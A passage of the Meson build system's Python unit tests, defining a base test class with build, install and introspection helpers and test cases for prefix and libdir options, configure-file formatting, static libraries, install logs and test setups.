self.assertEqual(set(interp.funcs.keys()), set(astint.funcs.keys())) def test_mesondata_is_up_to_date(self): from mesonbuild.mesondata import mesondata err_msg = textwrap.dedent(''' ########################################################### ### mesonbuild.mesondata is not up-to-date ### ### Please regenerate it by running tools/gen_data.py ### ########################################################### ''') root_dir = Path(__file__).resolve().parent mesonbuild_dir = root_dir / 'mesonbuild' data_dirs = mesonbuild_dir.glob('**/data') data_files = [] # type: T.List[T.Tuple(str, str)] for i in data_dirs: for p in i.iterdir(): data_files += [(p.relative_to(mesonbuild_dir).as_posix(), hashlib.sha256(p.read_bytes()).hexdigest())] from pprint import pprint current_files = set(mesondata.keys()) scanned_files = set([x[0] for x in data_files]) self.assertSetEqual(current_files, scanned_files, err_msg + 'Data files were added or removed\n') errors = [] for i in data_files: if mesondata[i[0]].sha256sum != i[1]: errors += [i[0]] self.assertListEqual(errors, [], err_msg + 'Files were changed') class BasePlatformTests(unittest.TestCase): prefix = '/usr' libdir = 'lib' def setUp(self): super().setUp() self.maxDiff = None src_root = os.path.dirname(__file__) src_root = os.path.join(os.getcwd(), src_root) self.src_root = src_root # Get the backend # FIXME: Extract this from argv? 
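        # The backend defaults to ninja; setting the MESON_UNIT_TEST_BACKEND
        # environment variable (e.g. to 'vs' or 'xcode') switches the whole
        # test run to that backend, as read just below.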
self.backend = getattr(Backend, os.environ.get('MESON_UNIT_TEST_BACKEND', 'ninja')) self.meson_args = ['--backend=' + self.backend.name] self.meson_native_file = None self.meson_cross_file = None self.meson_command = python_command + [get_meson_script()] self.setup_command = self.meson_command + self.meson_args self.mconf_command = self.meson_command + ['configure'] self.mintro_command = self.meson_command + ['introspect'] self.wrap_command = self.meson_command + ['wrap'] self.rewrite_command = self.meson_command + ['rewrite'] # Backend-specific build commands self.build_command, self.clean_command, self.test_command, self.install_command, \ self.uninstall_command = get_backend_commands(self.backend) # Test directories self.common_test_dir = os.path.join(src_root, 'test cases/common') self.vala_test_dir = os.path.join(src_root, 'test cases/vala') self.framework_test_dir = os.path.join(src_root, 'test cases/frameworks') self.unit_test_dir = os.path.join(src_root, 'test cases/unit') self.rewrite_test_dir = os.path.join(src_root, 'test cases/rewrite') self.linuxlike_test_dir = os.path.join(src_root, 'test cases/linuxlike') # Misc stuff self.orig_env = os.environ.copy() if self.backend is Backend.ninja: self.no_rebuild_stdout = ['ninja: no work to do.', 'samu: nothing to do'] else: # VS doesn't have a stable output when no changes are done # XCode backend is untested with unit tests, help welcome! self.no_rebuild_stdout = ['UNKNOWN BACKEND {!r}'.format(self.backend.name)] self.builddirs = [] self.new_builddir() def change_builddir(self, newdir): self.builddir = newdir self.privatedir = os.path.join(self.builddir, 'meson-private') self.logdir = os.path.join(self.builddir, 'meson-logs') self.installdir = os.path.join(self.builddir, 'install') self.distdir = os.path.join(self.builddir, 'meson-dist') self.mtest_command = self.meson_command + ['test', '-C', self.builddir] self.builddirs.append(self.builddir) def new_builddir(self): if not is_cygwin(): # Keep builddirs inside the source tree so that virus scanners # don't complain newdir = tempfile.mkdtemp(dir=os.getcwd()) else: # But not on Cygwin because that breaks the umask tests. See: # https://github.com/mesonbuild/meson/pull/5546#issuecomment-509666523 newdir = tempfile.mkdtemp() # In case the directory is inside a symlinked directory, find the real # path otherwise we might not find the srcdir from inside the builddir. newdir = os.path.realpath(newdir) self.change_builddir(newdir) def _print_meson_log(self): log = os.path.join(self.logdir, 'meson-log.txt') if not os.path.isfile(log): print("{!r} doesn't exist".format(log)) return with open(log, 'r', encoding='utf-8') as f: print(f.read()) def tearDown(self): for path in self.builddirs: try: windows_proof_rmtree(path) except FileNotFoundError: pass os.environ.clear() os.environ.update(self.orig_env) super().tearDown() def _run(self, command, *, workdir=None, override_envvars=None): ''' Run a command while printing the stdout and stderr to stdout, and also return a copy of it ''' # If this call hangs CI will just abort. It is very hard to distinguish # between CI issue and test bug in that case. Set timeout and fail loud # instead. 
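        # The subprocess.run() call below passes timeout=60 * 5, so any single
        # command gets at most five minutes before it raises TimeoutExpired
        # rather than hanging the CI job indefinitely.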
if override_envvars is None: env = None else: env = os.environ.copy() env.update(override_envvars) p = subprocess.run(command, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, env=env, universal_newlines=True, cwd=workdir, timeout=60 * 5) print(p.stdout) if p.returncode != 0: if 'MESON_SKIP_TEST' in p.stdout: raise unittest.SkipTest('Project requested skipping.') raise subprocess.CalledProcessError(p.returncode, command, output=p.stdout) return p.stdout def init(self, srcdir, *, extra_args=None, default_args=True, inprocess=False, override_envvars=None, workdir=None): self.assertPathExists(srcdir) if extra_args is None: extra_args = [] if not isinstance(extra_args, list): extra_args = [extra_args] args = [srcdir, self.builddir] if default_args: args += ['--prefix', self.prefix] if self.libdir: args += ['--libdir', self.libdir] if self.meson_native_file: args += ['--native-file', self.meson_native_file] if self.meson_cross_file: args += ['--cross-file', self.meson_cross_file] self.privatedir = os.path.join(self.builddir, 'meson-private') if inprocess: try: (returncode, out, err) = run_configure_inprocess(self.meson_args + args + extra_args, override_envvars) if 'MESON_SKIP_TEST' in out: raise unittest.SkipTest('Project requested skipping.') if returncode != 0: self._print_meson_log() print('Stdout:\n') print(out) print('Stderr:\n') print(err) raise RuntimeError('Configure failed') except Exception: self._print_meson_log() raise finally: # Close log file to satisfy Windows file locking mesonbuild.mlog.shutdown() mesonbuild.mlog.log_dir = None mesonbuild.mlog.log_file = None else: try: out = self._run(self.setup_command + args + extra_args, override_envvars=override_envvars, workdir=workdir) except unittest.SkipTest: raise unittest.SkipTest('Project requested skipping: ' + srcdir) except Exception: self._print_meson_log() raise return out def build(self, target=None, *, extra_args=None, override_envvars=None): if extra_args is None: extra_args = [] # Add arguments for building the target (if specified), # and using the build dir (if required, with VS) args = get_builddir_target_args(self.backend, self.builddir, target) return self._run(self.build_command + args + extra_args, workdir=self.builddir, override_envvars=override_envvars) def clean(self, *, override_envvars=None): dir_args = get_builddir_target_args(self.backend, self.builddir, None) self._run(self.clean_command + dir_args, workdir=self.builddir, override_envvars=override_envvars) def run_tests(self, *, inprocess=False, override_envvars=None): if not inprocess: self._run(self.test_command, workdir=self.builddir, override_envvars=override_envvars) else: with mock.patch.dict(os.environ, override_envvars): run_mtest_inprocess(['-C', self.builddir]) def install(self, *, use_destdir=True, override_envvars=None): if self.backend is not Backend.ninja: raise unittest.SkipTest('{!r} backend can\'t install files'.format(self.backend.name)) if use_destdir: destdir = {'DESTDIR': self.installdir} if override_envvars is None: override_envvars = destdir else: override_envvars.update(destdir) self._run(self.install_command, workdir=self.builddir, override_envvars=override_envvars) def uninstall(self, *, override_envvars=None): self._run(self.uninstall_command, workdir=self.builddir, override_envvars=override_envvars) def run_target(self, target, *, override_envvars=None): ''' Run a Ninja target while printing the stdout and stderr to stdout, and also return a copy of it ''' return self.build(target=target, override_envvars=override_envvars) def 
setconf(self, arg, will_build=True): if not isinstance(arg, list): arg = [arg] if will_build: ensure_backend_detects_changes(self.backend) self._run(self.mconf_command + arg + [self.builddir]) def wipe(self): windows_proof_rmtree(self.builddir) def utime(self, f): ensure_backend_detects_changes(self.backend) os.utime(f) def get_compdb(self): if self.backend is not Backend.ninja: raise unittest.SkipTest('Compiler db not available with {} backend'.format(self.backend.name)) try: with open(os.path.join(self.builddir, 'compile_commands.json')) as ifile: contents = json.load(ifile) except FileNotFoundError: raise unittest.SkipTest('Compiler db not found') # If Ninja is using .rsp files, generate them, read their contents, and # replace it as the command for all compile commands in the parsed json. if len(contents) > 0 and contents[0]['command'].endswith('.rsp'): # Pretend to build so that the rsp files are generated self.build(extra_args=['-d', 'keeprsp', '-n']) for each in contents: # Extract the actual command from the rsp file compiler, rsp = each['command'].split(' @') rsp = os.path.join(self.builddir, rsp) # Replace the command with its contents with open(rsp, 'r', encoding='utf-8') as f: each['command'] = compiler + ' ' + f.read() return contents def get_meson_log(self): with open(os.path.join(self.builddir, 'meson-logs', 'meson-log.txt')) as f: return f.readlines() def get_meson_log_compiler_checks(self): ''' Fetch a list command-lines run by meson for compiler checks. Each command-line is returned as a list of arguments. ''' log = self.get_meson_log() prefix = 'Command line:' cmds = [l[len(prefix):].split() for l in log if l.startswith(prefix)] return cmds def get_meson_log_sanitychecks(self): ''' Same as above, but for the sanity checks that were run ''' log = self.get_meson_log() prefix = 'Sanity check compiler command line:' cmds = [l[len(prefix):].split() for l in log if l.startswith(prefix)] return cmds def introspect(self, args): if isinstance(args, str): args = [args] out = subprocess.check_output(self.mintro_command + args + [self.builddir], universal_newlines=True) return json.loads(out) def introspect_directory(self, directory, args): if isinstance(args, str): args = [args] out = subprocess.check_output(self.mintro_command + args + [directory], universal_newlines=True) try: obj = json.loads(out) except Exception as e: print(out) raise e return obj def assertPathEqual(self, path1, path2): ''' Handles a lot of platform-specific quirks related to paths such as separator, case-sensitivity, etc. ''' self.assertEqual(PurePath(path1), PurePath(path2)) def assertPathListEqual(self, pathlist1, pathlist2): self.assertEqual(len(pathlist1), len(pathlist2)) worklist = list(zip(pathlist1, pathlist2)) for i in worklist: if i[0] is None: self.assertEqual(i[0], i[1]) else: self.assertPathEqual(i[0], i[1]) def assertPathBasenameEqual(self, path, basename): msg = '{!r} does not end with {!r}'.format(path, basename) # We cannot use os.path.basename because it returns '' when the path # ends with '/' for some silly reason. This is not how the UNIX utility # `basename` works. 
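        # For example: os.path.basename('/foo/bar/') == '' whereas
        # PurePath('/foo/bar/').parts[-1] == 'bar', which matches what
        # `basename /foo/bar/` prints.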
path_basename = PurePath(path).parts[-1] self.assertEqual(PurePath(path_basename), PurePath(basename), msg) def assertReconfiguredBuildIsNoop(self): 'Assert that we reconfigured and then there was nothing to do' ret = self.build() self.assertIn('The Meson build system', ret) if self.backend is Backend.ninja: for line in ret.split('\n'): if line in self.no_rebuild_stdout: break else: raise AssertionError('build was reconfigured, but was not no-op') elif self.backend is Backend.vs: # Ensure that some target said that no rebuild was done # XXX: Note CustomBuild did indeed rebuild, because of the regen checker! self.assertIn('ClCompile:\n All outputs are up-to-date.', ret) self.assertIn('Link:\n All outputs are up-to-date.', ret) # Ensure that no targets were built self.assertNotRegex(ret, re.compile('ClCompile:\n [^\n]*cl', flags=re.IGNORECASE)) self.assertNotRegex(ret, re.compile('Link:\n [^\n]*link', flags=re.IGNORECASE)) elif self.backend is Backend.xcode: raise unittest.SkipTest('Please help us fix this test on the xcode backend') else: raise RuntimeError('Invalid backend: {!r}'.format(self.backend.name)) def assertBuildIsNoop(self): ret = self.build() if self.backend is Backend.ninja: self.assertIn(ret.split('\n')[-2], self.no_rebuild_stdout) elif self.backend is Backend.vs: # Ensure that some target of each type said that no rebuild was done # We always have at least one CustomBuild target for the regen checker self.assertIn('CustomBuild:\n All outputs are up-to-date.', ret) self.assertIn('ClCompile:\n All outputs are up-to-date.', ret) self.assertIn('Link:\n All outputs are up-to-date.', ret) # Ensure that no targets were built self.assertNotRegex(ret, re.compile('CustomBuild:\n [^\n]*cl', flags=re.IGNORECASE)) self.assertNotRegex(ret, re.compile('ClCompile:\n [^\n]*cl', flags=re.IGNORECASE)) self.assertNotRegex(ret, re.compile('Link:\n [^\n]*link', flags=re.IGNORECASE)) elif self.backend is Backend.xcode: raise unittest.SkipTest('Please help us fix this test on the xcode backend') else: raise RuntimeError('Invalid backend: {!r}'.format(self.backend.name)) def assertRebuiltTarget(self, target): ret = self.build() if self.backend is Backend.ninja: self.assertIn('Linking target {}'.format(target), ret) elif self.backend is Backend.vs: # Ensure that this target was rebuilt linkre = re.compile('Link:\n [^\n]*link[^\n]*' + target, flags=re.IGNORECASE) self.assertRegex(ret, linkre) elif self.backend is Backend.xcode: raise unittest.SkipTest('Please help us fix this test on the xcode backend') else: raise RuntimeError('Invalid backend: {!r}'.format(self.backend.name)) @staticmethod def get_target_from_filename(filename): base = os.path.splitext(filename)[0] if base.startswith(('lib', 'cyg')): return base[3:] return base def assertBuildRelinkedOnlyTarget(self, target): ret = self.build() if self.backend is Backend.ninja: linked_targets = [] for line in ret.split('\n'): if 'Linking target' in line: fname = line.rsplit('target ')[-1] linked_targets.append(self.get_target_from_filename(fname)) self.assertEqual(linked_targets, [target]) elif self.backend is Backend.vs: # Ensure that this target was rebuilt linkre = re.compile(r'Link:\n [^\n]*link.exe[^\n]*/OUT:".\\([^"]*)"', flags=re.IGNORECASE) matches = linkre.findall(ret) self.assertEqual(len(matches), 1, msg=matches) self.assertEqual(self.get_target_from_filename(matches[0]), target) elif self.backend is Backend.xcode: raise unittest.SkipTest('Please help us fix this test on the xcode backend') else: raise RuntimeError('Invalid backend: 
{!r}'.format(self.backend.name)) def assertPathExists(self, path): m = 'Path {!r} should exist'.format(path) self.assertTrue(os.path.exists(path), msg=m) def assertPathDoesNotExist(self, path): m = 'Path {!r} should not exist'.format(path) self.assertFalse(os.path.exists(path), msg=m) class AllPlatformTests(BasePlatformTests): ''' Tests that should run on all platforms ''' def test_default_options_prefix(self): ''' Tests that setting a prefix in default_options in project() works. Can't be an ordinary test because we pass --prefix to meson there. https://github.com/mesonbuild/meson/issues/1349 ''' testdir = os.path.join(self.common_test_dir, '88 default options') self.init(testdir, default_args=False) opts = self.introspect('--buildoptions') for opt in opts: if opt['name'] == 'prefix': prefix = opt['value'] self.assertEqual(prefix, '/absoluteprefix') def test_do_conf_file_preserve_newlines(self): def conf_file(in_data, confdata): with temp_filename() as fin: with open(fin, 'wb') as fobj: fobj.write(in_data.encode('utf-8')) with temp_filename() as fout: mesonbuild.mesonlib.do_conf_file(fin, fout, confdata, 'meson') with open(fout, 'rb') as fobj: return fobj.read().decode('utf-8') confdata = {'VAR': ('foo', 'bar')} self.assertEqual(conf_file('@VAR@\n@VAR@\n', confdata), 'foo\nfoo\n') self.assertEqual(conf_file('@VAR@\r\n@VAR@\r\n', confdata), 'foo\r\nfoo\r\n') def test_do_conf_file_by_format(self): def conf_str(in_data, confdata, vformat): (result, missing_variables, confdata_useless) = mesonbuild.mesonlib.do_conf_str(in_data, confdata, variable_format = vformat) return '\n'.join(result) def check_formats(confdata, result): self.assertEqual(conf_str(['#mesondefine VAR'], confdata, 'meson'), result) self.assertEqual(conf_str(['#cmakedefine VAR ${VAR}'], confdata, 'cmake'), result) self.assertEqual(conf_str(['#cmakedefine VAR @VAR@'], confdata, 'cmake@'), result) confdata = ConfigurationData() # Key error as they do not exists check_formats(confdata, '/* #undef VAR */\n') # Check boolean confdata.values = {'VAR': (False, 'description')} check_formats(confdata, '#undef VAR\n') confdata.values = {'VAR': (True, 'description')} check_formats(confdata, '#define VAR\n') # Check string confdata.values = {'VAR': ('value', 'description')} check_formats(confdata, '#define VAR value\n') # Check integer confdata.values = {'VAR': (10, 'description')} check_formats(confdata, '#define VAR 10\n') # Check multiple string with cmake formats confdata.values = {'VAR': ('value', 'description')} self.assertEqual(conf_str(['#cmakedefine VAR xxx @VAR@ yyy @VAR@'], confdata, 'cmake@'), '#define VAR xxx value yyy value\n') self.assertEqual(conf_str(['#define VAR xxx @VAR@ yyy @VAR@'], confdata, 'cmake@'), '#define VAR xxx value yyy value') self.assertEqual(conf_str(['#cmakedefine VAR xxx ${VAR} yyy ${VAR}'], confdata, 'cmake'), '#define VAR xxx value yyy value\n') self.assertEqual(conf_str(['#define VAR xxx ${VAR} yyy ${VAR}'], confdata, 'cmake'), '#define VAR xxx value yyy value') # Handles meson format exceptions # Unknown format self.assertRaises(mesonbuild.mesonlib.MesonException, conf_str, ['#mesondefine VAR xxx'], confdata, 'unknown_format') # More than 2 params in mesondefine self.assertRaises(mesonbuild.mesonlib.MesonException, conf_str, ['#mesondefine VAR xxx'], confdata, 'meson') # Mismatched line with format self.assertRaises(mesonbuild.mesonlib.MesonException, conf_str, ['#cmakedefine VAR'], confdata, 'meson') self.assertRaises(mesonbuild.mesonlib.MesonException, conf_str, ['#mesondefine VAR'], confdata, 
'cmake') self.assertRaises(mesonbuild.mesonlib.MesonException, conf_str, ['#mesondefine VAR'], confdata, 'cmake@') # Dict value in confdata confdata.values = {'VAR': (['value'], 'description')} self.assertRaises(mesonbuild.mesonlib.MesonException, conf_str, ['#mesondefine VAR'], confdata, 'meson') def test_absolute_prefix_libdir(self): ''' Tests that setting absolute paths for --prefix and --libdir work. Can't be an ordinary test because these are set via the command-line. https://github.com/mesonbuild/meson/issues/1341 https://github.com/mesonbuild/meson/issues/1345 ''' testdir = os.path.join(self.common_test_dir, '88 default options') # on Windows, /someabs is *not* an absolute path prefix = 'x:/someabs' if is_windows() else '/someabs' libdir = 'libdir' extra_args = ['--prefix=' + prefix, # This can just be a relative path, but we want to test # that passing this as an absolute path also works '--libdir=' + prefix + '/' + libdir] self.init(testdir, extra_args=extra_args, default_args=False) opts = self.introspect('--buildoptions') for opt in opts: if opt['name'] == 'prefix': self.assertEqual(prefix, opt['value']) elif opt['name'] == 'libdir': self.assertEqual(libdir, opt['value']) def test_libdir_must_be_inside_prefix(self): ''' Tests that libdir is forced to be inside prefix no matter how it is set. Must be a unit test for obvious reasons. ''' testdir = os.path.join(self.common_test_dir, '1 trivial') # libdir being inside prefix is ok if is_windows(): args = ['--prefix', 'x:/opt', '--libdir', 'x:/opt/lib32'] else: args = ['--prefix', '/opt', '--libdir', '/opt/lib32'] self.init(testdir, extra_args=args) self.wipe() # libdir not being inside prefix is not ok if is_windows(): args = ['--prefix', 'x:/usr', '--libdir', 'x:/opt/lib32'] else: args = ['--prefix', '/usr', '--libdir', '/opt/lib32'] self.assertRaises(subprocess.CalledProcessError, self.init, testdir, extra_args=args) self.wipe() # libdir must be inside prefix even when set via mesonconf self.init(testdir) if is_windows(): self.assertRaises(subprocess.CalledProcessError, self.setconf, '-Dlibdir=x:/opt', False) else: self.assertRaises(subprocess.CalledProcessError, self.setconf, '-Dlibdir=/opt', False) def test_prefix_dependent_defaults(self): ''' Tests that configured directory paths are set to prefix dependent defaults. ''' testdir = os.path.join(self.common_test_dir, '1 trivial') expected = { '/opt': {'prefix': '/opt', 'bindir': 'bin', 'datadir': 'share', 'includedir': 'include', 'infodir': 'share/info', 'libexecdir': 'libexec', 'localedir': 'share/locale', 'localstatedir': 'var', 'mandir': 'share/man', 'sbindir': 'sbin', 'sharedstatedir': 'com', 'sysconfdir': 'etc'}, '/usr': {'prefix': '/usr', 'bindir': 'bin', 'datadir': 'share', 'includedir': 'include', 'infodir': 'share/info', 'libexecdir': 'libexec', 'localedir': 'share/locale', 'localstatedir': '/var', 'mandir': 'share/man', 'sbindir': 'sbin', 'sharedstatedir': '/var/lib', 'sysconfdir': '/etc'}, '/usr/local': {'prefix': '/usr/local', 'bindir': 'bin', 'datadir': 'share', 'includedir': 'include', 'infodir': 'share/info', 'libexecdir': 'libexec', 'localedir': 'share/locale', 'localstatedir': '/var/local', 'mandir': 'share/man', 'sbindir': 'sbin', 'sharedstatedir': '/var/local/lib', 'sysconfdir': 'etc'}, # N.B. 
We don't check 'libdir' as it's platform dependent, see # default_libdir(): } if mesonbuild.mesonlib.default_prefix() == '/usr/local': expected[None] = expected['/usr/local'] for prefix in expected: args = [] if prefix: args += ['--prefix', prefix] self.init(testdir, extra_args=args, default_args=False) opts = self.introspect('--buildoptions') for opt in opts: name = opt['name'] value = opt['value'] if name in expected[prefix]: self.assertEqual(value, expected[prefix][name]) self.wipe() def test_default_options_prefix_dependent_defaults(self): ''' Tests that setting a prefix in default_options in project() sets prefix dependent defaults for other options, and that those defaults can be overridden in default_options or by the command line. ''' testdir = os.path.join(self.common_test_dir, '164 default options prefix dependent defaults') expected = { '': {'prefix': '/usr', 'sysconfdir': '/etc', 'localstatedir': '/var', 'sharedstatedir': '/sharedstate'}, '--prefix=/usr': {'prefix': '/usr', 'sysconfdir': '/etc', 'localstatedir': '/var', 'sharedstatedir': '/sharedstate'}, '--sharedstatedir=/var/state': {'prefix': '/usr', 'sysconfdir': '/etc', 'localstatedir': '/var', 'sharedstatedir': '/var/state'}, '--sharedstatedir=/var/state --prefix=/usr --sysconfdir=sysconf': {'prefix': '/usr', 'sysconfdir': 'sysconf', 'localstatedir': '/var', 'sharedstatedir': '/var/state'}, } for args in expected: self.init(testdir, extra_args=args.split(), default_args=False) opts = self.introspect('--buildoptions') for opt in opts: name = opt['name'] value = opt['value'] if name in expected[args]: self.assertEqual(value, expected[args][name]) self.wipe() def test_clike_get_library_dirs(self): env = get_fake_env() cc = env.detect_c_compiler(MachineChoice.HOST) for d in cc.get_library_dirs(env): self.assertTrue(os.path.exists(d)) self.assertTrue(os.path.isdir(d)) self.assertTrue(os.path.isabs(d)) def test_static_library_overwrite(self): ''' Tests that static libraries are never appended to, always overwritten. Has to be a unit test because this involves building a project, reconfiguring, and building it again so that `ar` is run twice on the same static library. 
https://github.com/mesonbuild/meson/issues/1355 ''' testdir = os.path.join(self.common_test_dir, '3 static') env = get_fake_env(testdir, self.builddir, self.prefix) cc = env.detect_c_compiler(MachineChoice.HOST) static_linker = env.detect_static_linker(cc) if is_windows(): raise unittest.SkipTest('https://github.com/mesonbuild/meson/issues/1526') if not isinstance(static_linker, mesonbuild.linkers.ArLinker): raise unittest.SkipTest('static linker is not `ar`') # Configure self.init(testdir) # Get name of static library targets = self.introspect('--targets') self.assertEqual(len(targets), 1) libname = targets[0]['filename'][0] # Build and get contents of static library self.build() before = self._run(['ar', 't', os.path.join(self.builddir, libname)]).split() # Filter out non-object-file contents before = [f for f in before if f.endswith(('.o', '.obj'))] # Static library should contain only one object self.assertEqual(len(before), 1, msg=before) # Change the source to be built into the static library self.setconf('-Dsource=libfile2.c') self.build() after = self._run(['ar', 't', os.path.join(self.builddir, libname)]).split() # Filter out non-object-file contents after = [f for f in after if f.endswith(('.o', '.obj'))] # Static library should contain only one object self.assertEqual(len(after), 1, msg=after) # and the object must have changed self.assertNotEqual(before, after) def test_static_compile_order(self): ''' Test that the order of files in a compiler command-line while compiling and linking statically is deterministic. This can't be an ordinary test case because we need to inspect the compiler database. https://github.com/mesonbuild/meson/pull/951 ''' testdir = os.path.join(self.common_test_dir, '5 linkstatic') self.init(testdir) compdb = self.get_compdb() # Rules will get written out in this order self.assertTrue(compdb[0]['file'].endswith("libfile.c")) self.assertTrue(compdb[1]['file'].endswith("libfile2.c")) self.assertTrue(compdb[2]['file'].endswith("libfile3.c")) self.assertTrue(compdb[3]['file'].endswith("libfile4.c")) # FIXME: We don't have access to the linker command def test_run_target_files_path(self): ''' Test that run_targets are run from the correct directory https://github.com/mesonbuild/meson/issues/957 ''' testdir = os.path.join(self.common_test_dir, '52 run target') self.init(testdir) self.run_target('check_exists') def test_install_introspection(self): ''' Tests that the Meson introspection API exposes install filenames correctly https://github.com/mesonbuild/meson/issues/829 ''' if self.backend is not Backend.ninja: raise unittest.SkipTest('{!r} backend can\'t install files'.format(self.backend.name)) testdir = os.path.join(self.common_test_dir, '8 install') self.init(testdir) intro = self.introspect('--targets') if intro[0]['type'] == 'executable': intro = intro[::-1] self.assertPathListEqual(intro[0]['install_filename'], ['/usr/lib/libstat.a']) self.assertPathListEqual(intro[1]['install_filename'], ['/usr/bin/prog' + exe_suffix]) def test_install_subdir_introspection(self): ''' Test that the Meson introspection API also contains subdir install information https://github.com/mesonbuild/meson/issues/5556 ''' testdir = os.path.join(self.common_test_dir, '60 install subdir') self.init(testdir) intro = self.introspect('--installed') expected = { 'sub2': 'share/sub2', 'subdir/sub1': 'share/sub1', 'subdir/sub_elided': 'share', 'sub1': 'share/sub1', 'sub/sub1': 'share/sub1', 'sub_elided': 'share', 'nested_elided/sub': 'share', } self.assertEqual(len(intro), 
len(expected)) # Convert expected to PurePath expected_converted = {PurePath(os.path.join(testdir, key)): PurePath(os.path.join(self.prefix, val)) for key, val in expected.items()} intro_converted = {PurePath(key): PurePath(val) for key, val in intro.items()} for src, dst in expected_converted.items(): self.assertIn(src, intro_converted) self.assertEqual(dst, intro_converted[src]) def test_install_introspection_multiple_outputs(self): ''' Tests that the Meson introspection API exposes multiple install filenames correctly without crashing https://github.com/mesonbuild/meson/pull/4555 Reverted to the first file only because of https://github.com/mesonbuild/meson/pull/4547#discussion_r244173438 TODO Change the format to a list officially in a followup PR ''' if self.backend is not Backend.ninja: raise unittest.SkipTest('{!r} backend can\'t install files'.format(self.backend.name)) testdir = os.path.join(self.common_test_dir, '141 custom target multiple outputs') self.init(testdir) intro = self.introspect('--targets') if intro[0]['type'] == 'executable': intro = intro[::-1] self.assertPathListEqual(intro[0]['install_filename'], ['/usr/include/diff.h', '/usr/bin/diff.sh']) self.assertPathListEqual(intro[1]['install_filename'], ['/opt/same.h', '/opt/same.sh']) self.assertPathListEqual(intro[2]['install_filename'], ['/usr/include/first.h', None]) self.assertPathListEqual(intro[3]['install_filename'], [None, '/usr/bin/second.sh']) def test_install_log_content(self): ''' Tests that the install-log.txt is consistent with the installed files and directories. Specifically checks that the log file only contains one entry per file/directory. https://github.com/mesonbuild/meson/issues/4499 ''' testdir = os.path.join(self.common_test_dir, '60 install subdir') self.init(testdir) self.install() installpath = Path(self.installdir) # Find installed files and directories expected = {installpath: 0} for name in installpath.rglob('*'): expected[name] = 0 # Find logged files and directories with Path(self.builddir, 'meson-logs', 'install-log.txt').open() as f: logged = list(map(lambda l: Path(l.strip()), filter(lambda l: not l.startswith('#'), f.readlines()))) for name in logged: self.assertTrue(name in expected, 'Log contains extra entry {}'.format(name)) expected[name] += 1 for name, count in expected.items(): self.assertGreater(count, 0, 'Log is missing entry for {}'.format(name)) self.assertLess(count, 2, 'Log has multiple entries for {}'.format(name)) def test_uninstall(self): exename = os.path.join(self.installdir, 'usr/bin/prog' + exe_suffix) testdir = os.path.join(self.common_test_dir, '8 install') self.init(testdir) self.assertPathDoesNotExist(exename) self.install() self.assertPathExists(exename) self.uninstall() self.assertPathDoesNotExist(exename) def test_forcefallback(self): testdir = os.path.join(self.unit_test_dir, '31 forcefallback') self.init(testdir, extra_args=['--wrap-mode=forcefallback']) self.build() self.run_tests() def test_force_fallback_for(self): testdir = os.path.join(self.unit_test_dir, '31 forcefallback') self.init(testdir, extra_args=['--force-fallback-for=zlib,foo']) self.build() self.run_tests() def test_env_ops_dont_stack(self): ''' Test that env ops prepend/append do not stack, and that this usage issues a warning ''' testdir = os.path.join(self.unit_test_dir, '63 test env does not stack') out = self.init(testdir) self.assertRegex(out, r'WARNING: Overriding.*TEST_VAR_APPEND') self.assertRegex(out, r'WARNING: Overriding.*TEST_VAR_PREPEND') self.assertNotRegex(out, r'WARNING: 
Overriding.*TEST_VAR_SET') self.run_tests() def test_testsetups(self): if not shutil.which('valgrind'): raise unittest.SkipTest('Valgrind not installed.') testdir = os.path.join(self.unit_test_dir, '2 testsetups') self.init(testdir) self.build() # Run tests without setup self.run_tests() with open(os.path.join(self.logdir, 'testlog.txt')) as f: basic_log = f.read() # Run buggy test with setup that has env that will make it fail self.assertRaises(subprocess.CalledProcessError, self._run, self.mtest_command + ['--setup=valgrind']) with open(os.path.join(self.logdir, 'testlog-valgrind.txt')) as f: vg_log = f.read() self.assertFalse('TEST_ENV is set' in basic_log) self.assertFalse('Memcheck' in basic_log) self.assertTrue('TEST_ENV is set' in vg_log) self.assertTrue('Memcheck' in vg_log) # Run buggy test with setup without env that will pass self._run(self.mtest_command + ['--setup=wrapper']) # Setup with no properties works self._run(self.mtest_command + ['--setup=empty']) # Setup with only env works self._run(self.mtest_command + ['--setup=onlyenv']) self._run(self.mtest_command + ['--setup=onlyenv2']) self._run(self.mtest_command + ['--setup=onlyenv3']) # Setup with only a timeout works self._run(self.mtest_command + ['--setup=timeout']) def test_testsetup_selection(self): testdir = os.path.join(self.unit_test_dir, '14 testsetup selection') self.init(testdir) self.build() # Run tests without setup self.run_tests() self.assertRaises(subprocess.CalledProcessError, self._run, self.mtest_command + ['--setup=missingfromfoo']) self._run(self.mtest_command + ['--setup=missingfromfoo', '--no-suite=foo:']) self._run(self.mtest_command + ['--setup=worksforall']) self._run(self.mtest_command + ['--setup=main:worksforall']) self.assertRaises(subprocess.CalledProcessError, self._run, self.mtest_command + ['--setup=onlyinbar']) self.assertRaises(subprocess.CalledProcessError, self._run, self.mtest_command + ['--setup=onlyinbar', '--no-suite=main:']) self._run(self.mtest_command + ['--setup=onlyinbar', '--no-suite=main:', '--no-suite=foo:']) self._run(self.mtest_command + ['--setup=bar:onlyinbar']) self.assertRaises(subprocess.CalledProcessError, self._run, self.mtest_command + ['--setup=foo:onlyinbar']) self.assertRaises(subprocess.CalledProcessError, self._run, self.mtest_command + ['--setup=main:onlyinbar']) def test_testsetup_default(self): testdir = os.path.join(self.unit_test_dir, '49 testsetup default') self.init(testdir) self.build() # Run tests without --setup will cause the default setup to be used self.run_tests() with open(os.path.join(self.logdir, 'testlog.txt')) as f: default_log = f.read() # Run tests with explicitly using the same setup that is set as default self._run(self.mtest_command + ['--setup=mydefault']) with open(os.path.join(self.logdir, 'testlog-mydefault.txt')) as f: mydefault_log = f.read() # Run tests with another setup self._run(self.mtest_command + ['--setup=other']) with open(os.path.join(self.logdir, 'testlog-other.txt')) as f: other_log = f.read() self.assertTrue('ENV_A is 1' in default_log) self.assertTrue('ENV_B is 2' in default_log) self.assertTrue('ENV_C is 2' in default_log) self.assertTrue('ENV_A is 1' in mydefault_log) self.assertTrue('ENV_B is 2' in mydefault_log) self.assertTrue('ENV_C is 2' in mydefault_log) self.assertTrue('ENV_A is 1' in other_log) self.assertTrue('ENV_B is 3' in other_log) self.assertTrue('ENV_C is 2' in other_log) def assertFailedTestCount(self, failure_count, command): try: self._run(command) self.assertEqual(0, failure_count, 'Expected %d 
